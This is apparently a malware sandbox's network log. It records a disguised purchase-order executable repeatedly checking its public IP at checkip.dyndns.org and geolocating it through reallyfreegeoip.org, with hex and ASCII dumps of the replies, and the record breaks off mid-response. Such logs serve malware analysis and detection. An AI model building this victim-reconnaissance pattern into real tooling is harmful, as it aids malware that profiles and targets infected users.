                                                                                                                                            Dec 16, 2024 14:14:12.654731989 CET151OUTGET / HTTP/1.1
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                            Host: checkip.dyndns.org
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Dec 16, 2024 14:14:14.085479975 CET273INHTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 16 Dec 2024 13:14:13 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 104
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Pragma: no-cache
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                            Dec 16, 2024 14:14:14.090220928 CET127OUTGET / HTTP/1.1
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                            Host: checkip.dyndns.org
                                                                                                                                            Dec 16, 2024 14:14:14.581480026 CET273INHTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 16 Dec 2024 13:14:14 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 104
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Pragma: no-cache
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                            Dec 16, 2024 14:14:16.880996943 CET127OUTGET / HTTP/1.1
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                            Host: checkip.dyndns.org
                                                                                                                                            Dec 16, 2024 14:14:17.371956110 CET273INHTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 16 Dec 2024 13:14:17 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 104
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Pragma: no-cache
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            1192.168.2.449738132.226.8.169807340C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Dec 16, 2024 14:14:19.252991915 CET127OUTGET / HTTP/1.1
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                            Host: checkip.dyndns.org
                                                                                                                                            Dec 16, 2024 14:14:20.684659958 CET273INHTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 16 Dec 2024 13:14:20 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 104
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Pragma: no-cache
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            2192.168.2.449740132.226.8.169807340C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Dec 16, 2024 14:14:22.480211020 CET127OUTGET / HTTP/1.1
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                            Host: checkip.dyndns.org
                                                                                                                                            Dec 16, 2024 14:14:24.170289993 CET273INHTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 16 Dec 2024 13:14:23 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 104
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Pragma: no-cache
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            3192.168.2.449744132.226.8.169807340C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Dec 16, 2024 14:14:25.956545115 CET151OUTGET / HTTP/1.1
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                            Host: checkip.dyndns.org
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Dec 16, 2024 14:14:28.073029041 CET273INHTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 16 Dec 2024 13:14:27 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 104
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Pragma: no-cache
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            4192.168.2.449749132.226.8.169807340C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Dec 16, 2024 14:14:29.866035938 CET151OUTGET / HTTP/1.1
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                            Host: checkip.dyndns.org
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Dec 16, 2024 14:14:31.830570936 CET273INHTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 16 Dec 2024 13:14:31 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 104
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Pragma: no-cache
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            5192.168.2.449752132.226.8.169807340C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Dec 16, 2024 14:14:33.623092890 CET151OUTGET / HTTP/1.1
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                            Host: checkip.dyndns.org
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Dec 16, 2024 14:14:35.948550940 CET273INHTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 16 Dec 2024 13:14:35 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 104
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Pragma: no-cache
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            6192.168.2.449754132.226.8.169807340C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Dec 16, 2024 14:14:37.743743896 CET151OUTGET / HTTP/1.1
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                            Host: checkip.dyndns.org
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Dec 16, 2024 14:14:39.210098028 CET273INHTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 16 Dec 2024 13:14:38 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 104
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Pragma: no-cache
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            7192.168.2.449756132.226.8.169807340C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Dec 16, 2024 14:14:41.014059067 CET151OUTGET / HTTP/1.1
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                            Host: checkip.dyndns.org
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Dec 16, 2024 14:14:42.601787090 CET273INHTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 16 Dec 2024 13:14:42 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 104
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Pragma: no-cache
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            0192.168.2.449736172.67.177.1344437340C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-12-16 13:14:16 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            2024-12-16 13:14:16 UTC876INHTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 16 Dec 2024 13:14:16 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 362
                                                                                                                                            Connection: close
                                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Age: 343625
                                                                                                                                            Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fWBykY4Dn7qxh6XU7McxKAVYvrurI7VP%2ByV%2B4Cb7PXZim2NiuItsf713ajvrfZpE0oDKPlucHbQUc6mig9WnVWVIuANPQyHFq9g9NzSzPIaHhrs%2FtfRmfvNxRdglCiiM02taNV8w"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 8f2eef7e5b5b0f79-EWR
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1498&min_rtt=1496&rtt_var=566&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1926121&cwnd=241&unsent_bytes=0&cid=b4ffb98dd35be710&ts=456&x=0"
                                                                                                                                            2024-12-16 13:14:16 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            1192.168.2.449737172.67.177.1344437340C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-12-16 13:14:18 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                                            2024-12-16 13:14:19 UTC882INHTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 16 Dec 2024 13:14:18 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 362
                                                                                                                                            Connection: close
                                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Age: 343627
                                                                                                                                            Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lI0LAqNFA8P8KZeCu11EV3oPM6W3Z0YW%2Bdund4zjM25HwaoKNFEEP%2BaNlG%2BgzVHdbzy93ui6H5CZ%2Fmoaukduhwm7Ftnasxq7egib4gmxvQAJkbMslceSCbe%2FQ2dA21f%2FrtkSaZbi"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 8f2eef8c8a5e41c1-EWR
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1866&min_rtt=1861&rtt_var=709&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1530398&cwnd=205&unsent_bytes=0&cid=6d9bef5e6a2ed929&ts=456&x=0"
                                                                                                                                            2024-12-16 13:14:19 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            2192.168.2.449739172.67.177.1344437340C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-12-16 13:14:21 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            2024-12-16 13:14:22 UTC876INHTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 16 Dec 2024 13:14:22 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 362
                                                                                                                                            Connection: close
                                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Age: 343631
                                                                                                                                            Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H21Mg1JA4ERwTMk8R1BNlvGVJWXvU5%2FHjMJ8snp37i20gG8OisQfM8WzJ%2FoZ9NN9dQ0RH8Be5aAX7na5VcGkA8DI13UrAUZhtSFHxnmOTrbf53KkJ5eFfUhBOV%2BVHxYu5rWyHaJI"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 8f2eefa0adb442ea-EWR
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1688&min_rtt=1683&rtt_var=642&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1689814&cwnd=143&unsent_bytes=0&cid=a46761df948d150f&ts=451&x=0"
                                                                                                                                            2024-12-16 13:14:22 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            3192.168.2.449742172.67.177.1344437340C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-12-16 13:14:25 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            2024-12-16 13:14:25 UTC876INHTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 16 Dec 2024 13:14:25 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 362
                                                                                                                                            Connection: close
                                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Age: 343634
                                                                                                                                            Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wpkafz8NRU%2BTSB87EV7mHnj6KzKdxX5nMmLv1ut5PK6pVo3PCMQxiP4YDZa5cU%2BbpFpknyhZnf6gsx94q3yZ7FbAYVHpBDZFEIKJTWp1vZy6GJBofxB7%2FTRnRI6WUR8eu4vqN4mx"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 8f2eefb66e16437b-EWR
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1599&min_rtt=1595&rtt_var=607&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1790312&cwnd=249&unsent_bytes=0&cid=231b16f25b8f7a0c&ts=450&x=0"
                                                                                                                                            2024-12-16 13:14:25 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            4192.168.2.449747172.67.177.1344437340C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-12-16 13:14:29 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                                            2024-12-16 13:14:29 UTC878INHTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 16 Dec 2024 13:14:29 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 362
                                                                                                                                            Connection: close
                                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Age: 343638
                                                                                                                                            Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                                            Accept-Ranges: bytes
